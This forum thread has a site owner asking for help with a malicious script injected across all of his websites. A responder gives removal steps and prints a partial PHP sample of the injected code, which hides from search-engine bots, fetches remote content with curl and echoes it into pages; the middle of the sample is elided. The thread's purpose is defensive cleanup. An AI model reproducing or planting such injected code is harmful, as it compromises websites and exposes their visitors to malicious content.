Hello,

Avast shows this malware “m-e.crossfitharlem.net/z/st1” and it is found across all our sites on one server, for example this one of ours: http://marijuanapictures.com/

Avast themselves have been in contact and says this script has been added to all our sites.

Where is it?
What is it?
Where is it directing people to?
How do we remove it!?

Many thanks for any help you guys and girls might have.

Regards
James

Here’s a sample from Sucuri…
http://sucuri.net/malware/malware-entry-mwanomalysp7

Hi, james26 and Asyn

After spending 18 Hours, now i found out the Solution/Removal of this Malware from Websites.

1. Download to your whole website
2. Manually find out this given Malicious code and DELETE it from ALL of your web-pages.

Malicious Code:

---

<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&& ---- ----- ---- ---- --------- } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>

---

EnJoy & Good Luck

It is best not to post sample code even if some of it is chopped, the last thing we want is for avast to alert on its own support site, so it is best to use an image.

Please remove the code.

that would be ironic. ;D

It wouldn’t be the first time with people posting example code and not an image.